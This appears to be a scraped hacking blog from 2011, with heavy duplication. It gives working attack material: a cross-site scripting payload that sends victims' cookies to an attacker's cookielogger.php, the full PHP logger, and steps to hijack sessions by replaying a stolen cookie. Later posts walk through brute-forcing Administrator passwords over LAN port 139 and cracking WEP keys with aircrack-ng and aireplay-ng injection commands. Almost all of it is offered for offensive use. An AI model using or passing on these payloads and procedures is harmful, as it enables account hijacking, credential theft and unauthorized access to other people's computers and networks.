Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.
The best way is to look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>
Clicking an image also can activate the script.For this purpose you can use the below code.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>
All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.
Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
Don't forget to comment if you like my post.
by hackiteasy
Here we show how you can hack a session using javascript and php.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
PHP Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.
Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.
The best way is to look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>
Clicking an image also can activate the script.For this purpose you can use the below code.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>
All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.
Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
Don't forget to comment if you like my post.
by hackiteasy
Finding admin page of any site
A web site can easily be hacked if you know the hack the admin of the website. So for that you need to know the admin page of the website. And that could be a headache sometimes.
So here is a page made by a hacker that works for you and searches the site for the admin page.
http://sc0rpion.ir/af/
Just go to the site and enter the url of the site or blog followed by a "/" and it would search for all those pages it thinks to be admin pages. Quite simple.
How it works-
The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not.
If there is any admin page it would show up.
So here is a page made by a hacker that works for you and searches the site for the admin page.
http://sc0rpion.ir/af/
Just go to the site and enter the url of the site or blog followed by a "/" and it would search for all those pages it thinks to be admin pages. Quite simple.
How it works-
The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not.
If there is any admin page it would show up.
Tuesday, January 11, 2011
The top 10 password breakers/crakers
The best password crackers. The list made from all password brealkers from all over the globe including versions from unix and widnows as well.
1. Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols
2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes
3. THC Hydra : A Fast network authentication cracker which support many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more
4. Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)
5. L0phtcrack : Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.
6. Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.
7. SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.
8. Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.
9. RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.
10 Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.
1. Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols
2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes
3. THC Hydra : A Fast network authentication cracker which support many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more
4. Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)
5. L0phtcrack : Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.
6. Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.
7. SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.
8. Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.
9. RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.
10 Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.
Hack computer in your LAN (Windows)
Here we hack a PC somwhere in our LAN. This is a simple trick that uses open port to gain access to the target computer.The Lan hacking technique uses port 139 for the hack. On a LAN mostly the port 139 would remain open.
Today,I will write about hacking computer inside the LAN network.
This technique will be taking advantage of Port 139.
Most of the time,Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
I will scan it using Nmap.
![[Image: 1_13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ur8NU9dQ3lqZZNFQrsHGR6uiYNKOHBaT77Cjb6LaDhDx0PyFJQQzkx1umyCSpHiWVQrHo5ZHsTXjrjqbaEiOSwyDPeD-9xkQ=s0-d)
I get the result and it shows Port 139 is opened up for me.
Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.
![[Image: 2_1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sObtzwsXCJoBQlLqmIeIYvFVSzEBzQpPZsrBbulsY2EiiC351Cc-w6KODC7D-iBw8YH3TPbdClpERi-ggPOesYls0eEgo=s0-d)
You now need to create a null session to the target computer.
![[Image: 3_3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t2cGgKicrIMBuroEztANiOOkxagFxB8iwXhoOeHVmwrevzBqjWaQgjXgv6429kpgAnNamkSqWRGSA3_TSMUdlSsBilot8=s0-d)
Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.
We will first using USER2SID to get the ID.
![[Image: 4_10.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tVsoGujqzr1przNaRpb7noiaUEwvOjtgJ8YUZeDIuzR9LZOmhnCTGDHI0rABs-0UyjX4IDelVxkHAlQPx3_5MMirwLYwbpXQ=s0-d)
We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".
Please leave out the S-1-,leave out all the - too.
![[Image: 5_8.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ueMC8SNt756c33jRv1FTVYaLXP3C2IU_Jwjrs7O6A00mzVtqRKIEML2TTMennwEXa3fPGyfplMTuHdt2_YmDla1-EKmIA0=s0-d)
Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is Administrator.
Create a text file called user.txt and the content will be the username of the Admin account.
![[Image: 6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vGB85N3N5_yb_1wFhl5iWDkXPzWWml8rFh7o3l_33yc_2TJJKjCdsFIc0qGqNg76oxbw_CE6ZsC9LH7OLfloMY8boNgQ=s0-d)
Prepare yourself a good wordlist.
![[Image: 7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t1onzfSDqSd0vdkMYwGldZmc0eS2P-rL0oIs_6tUUzG9Qr0M1WNiB-4AMza10PKdf09GJw9Tls2GhU7VpCspA8STu7hw=s0-d)
Now put both of them in the same directory with the NetBios Auditing Tool.
![[Image: 8.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u7-bVc8-EgFZQS2dRixSafFnji2pr5rR8-D0f3a59befh5qQKyiJTtzrXI1M4YcSBv3QfMZ2qVF24NJ-ra6AxSCUyf=s0-d)
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
![[Image: 9_1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tU4BBjz9lPm3KDUjrpPeiwN2-T-Eb5kyCCdDTBs_92inR93og3DxUeP8W9bZ7zPv6p8FchR_cE55lj95hCPsPrWo54fZP4=s0-d)
Press on enter and the tool will run through the passlist.
![[Image: 10.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v0AMUjUxNKBxOTk9ypE7duIK3bDh98XKpB2-y-fdQ2-J65YaJHaIxWxvUmboEWP1H0V91jeM32qkRr28kqJfZK1hCaIp8=s0-d)
In this case,I have get the password.
In order to proof that I can get access to the target computer using this password.
![[Image: 11.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vgx_jzwZ385beS0JG05ahxQeyLYfQ2Vi608AJSY1amTF7yz4BGgtyKGgOhQtHB7DO_bS_m2HoIElZaxM6314SEN4JMhbk=s0-d)
After you press enter,it will prompt you for the username and password.
![[Image: 12_6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s3AWQBBrEdIx0knEe8zHf7veIppv6td5iVmSQbHQA2i5s_64nwOtbRVCItJ8qMetJYL-wmJyIvkg-CaszCTksyH36oCkbH=s0-d)
Therefore,just input them inside the prompt and continue.
![[Image: 13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tzn0hu_J0prVknV2Lbn9dgBuS82ok84sp3isc5CYSgjy2gT5AyvITsowdjJGvyZzgBRWTRJX1rYSPhkwxl3m3GB7uuhyg=s0-d)
Target C drive will be on your screen.
![[Image: 14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s28Dp7i-bFN9SU0kVlG2seZxkX3_wArKp6YhwGBWtW-NW5SfLyCbAuOs6Ykc-gGHlGqPJxHp7QLIjLMwgB70VeVA74Y_w=s0-d)
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.
The download link of the tools will be:
Download Tools.rar
We check for open 139 port by using Zenmap, you can use any other port scanners as well.
For this you need to know the IP of computers in your network which would most probably look like 192.168.xx where only 'xx' changes in range 0 to 255 and shows different IPs.
Once we get the IP of the target machine we scan it using Nmap.
Here we see that port 139 is open and ready to be hacked.
We need these two hack tools-
** USER2SID & SID2USER
** NetBios Auditing Tool
Google them on the net.
After you get both of them,put them in the C:\ directory.
Create a null session on your computer do this as follows:-
Now open the Command Prompt and browse to the USER2SID & SID2USER folders .There will be 2 tools inside it,one would be USER2SID and another one be SID2USER.
We use USER2SID to get the ID of the user on target machine.
We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We use the ID which we got from the guest account and modify it-
"5 21 861567501 1383384898 839522115 500".
Please leave out the S-1-,leave out all the - too.
Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is "Administrator".
Create a text file called user.txt and the content will be the username of the Admin account.
Prepare yourself a good wordlist. Or get the list of most common password on the internet.
Now put both of them in the same directory with the NetBios Auditing Tool.
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
Press on enter and the tool will run through the passlist.
In this case,we have the password.
In order to proof that we can get access to the target computer using this password.
After you press enter,it will prompt you for the username and password.
Therefore,just input them inside the prompt and continue.
Target C drive will be pop on your screen.
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.
The download link of the tools will be:
Download Tools.rar
Today,I will write about hacking computer inside the LAN network.
This technique will be taking advantage of Port 139.
Most of the time,Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
I will scan it using Nmap.
I get the result and it shows Port 139 is opened up for me.
Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.
You now need to create a null session to the target computer.
Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.
We will first using USER2SID to get the ID.
We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".
Please leave out the S-1-,leave out all the - too.
Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is Administrator.
Create a text file called user.txt and the content will be the username of the Admin account.
Prepare yourself a good wordlist.
Now put both of them in the same directory with the NetBios Auditing Tool.
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
Press on enter and the tool will run through the passlist.
In this case,I have get the password.
In order to proof that I can get access to the target computer using this password.
After you press enter,it will prompt you for the username and password.
Therefore,just input them inside the prompt and continue.
Target C drive will be on your screen.
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.
The download link of the tools will be:
Download Tools.rar
We check for open 139 port by using Zenmap, you can use any other port scanners as well.
For this you need to know the IP of computers in your network which would most probably look like 192.168.xx where only 'xx' changes in range 0 to 255 and shows different IPs.
Once we get the IP of the target machine we scan it using Nmap.
Here we see that port 139 is open and ready to be hacked.
We need these two hack tools-
** USER2SID & SID2USER
** NetBios Auditing Tool
Google them on the net.
After you get both of them,put them in the C:\ directory.
Create a null session on your computer do this as follows:-
Now open the Command Prompt and browse to the USER2SID & SID2USER folders .There will be 2 tools inside it,one would be USER2SID and another one be SID2USER.
We use USER2SID to get the ID of the user on target machine.
We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We use the ID which we got from the guest account and modify it-
"5 21 861567501 1383384898 839522115 500".
Please leave out the S-1-,leave out all the - too.
Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is "Administrator".
Create a text file called user.txt and the content will be the username of the Admin account.
Prepare yourself a good wordlist. Or get the list of most common password on the internet.
Now put both of them in the same directory with the NetBios Auditing Tool.
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
Press on enter and the tool will run through the passlist.
In this case,we have the password.
In order to proof that we can get access to the target computer using this password.
After you press enter,it will prompt you for the username and password.
Therefore,just input them inside the prompt and continue.
Target C drive will be pop on your screen.
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.
The download link of the tools will be:
Download Tools.rar
WiFi Slax : a Linux made for wireless hacking
Ever tried dowloading those drivers(madwifi), or installing so many software on a linux for wireless testing and penetration. Now you won't have to sweat it out. Wifi Slax's team does it for you.
WifiSlax is a type of Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, kismet, madwifi drivers and many more...
When we tried using one of those we came to know that the distro is made in spain and thus all of its content was in Spanish but to no worries we translated that and the language of Linux is same all over so it proved to be no big problem.
Know more about Slax linux.
Get wifi slax here-
Download page- http://www.wifislax.com/descargas.php
WifiSlax is a type of Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, kismet, madwifi drivers and many more...
When we tried using one of those we came to know that the distro is made in spain and thus all of its content was in Spanish but to no worries we translated that and the language of Linux is same all over so it proved to be no big problem.
Know more about Slax linux.
Get wifi slax here-
Download page- http://www.wifislax.com/descargas.php
Monday, January 10, 2011
Hacking a WEP key with airodump on Ubuntu
These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro.
These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions.
The hack starts-
Install aircrack-ng – on Debian Etch by:
sudo apt-get install aircrack-ng
Then start aircrack-ng to look for wireless networks:
sudo airodump-ng eth1
Then notice the channel number of the wireless network you want to crack.
Quit aircrack-ng and start it again with med specific channel number to collect packages faster:
sudo airodump-ng -c 4 -w dump eth1
Then wait and let it collect about 500K IVS and the try the do the actual crack:
sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap
The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.
Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”
Sunday, January 9, 2011
Backtrack : The linux distro made for and by hackers
Backtrack linux is just what every hacker dreams of, a full system preloaded with every tool you would have ever wished for. It haws almost every tool ever invented for hackers to lay there hands on.
BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.
Backtrack was made for everyone including tools for the amateur hackers to deep balck hats.
Download Backtrack here:
Normal download Torrent
A few Tools
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:
* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
* BeEF (Browser Exploitation Framework)
* Hydra
A large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:
* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11, Bluetooth, RFID)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP
Source- http://www.backtrack-linux.org/
Sunday, January 2, 2011
Wireless Hacking tutorial using Backtrack
Wireless Hacking with backtrack 3 is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :- Backtrack 3 or newer release
- 1 wireless router
- Laptop with wireless card
And let the hack begins :
In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.
***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
************************************************************************
Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.
Ok let’s start!
Commands | Meaning
====================
*open up 3 shell konsoles by clicking the little black box next to the start button.
* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0
* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down
* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)
* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)
* Lets start seeing what AP’s are there
airodump-ng (device)
* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer
* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)
* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)
* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)
* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap
* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930
Get backtrack linux at - http://www.backtrack-linux.org/
No comments:
Post a Comment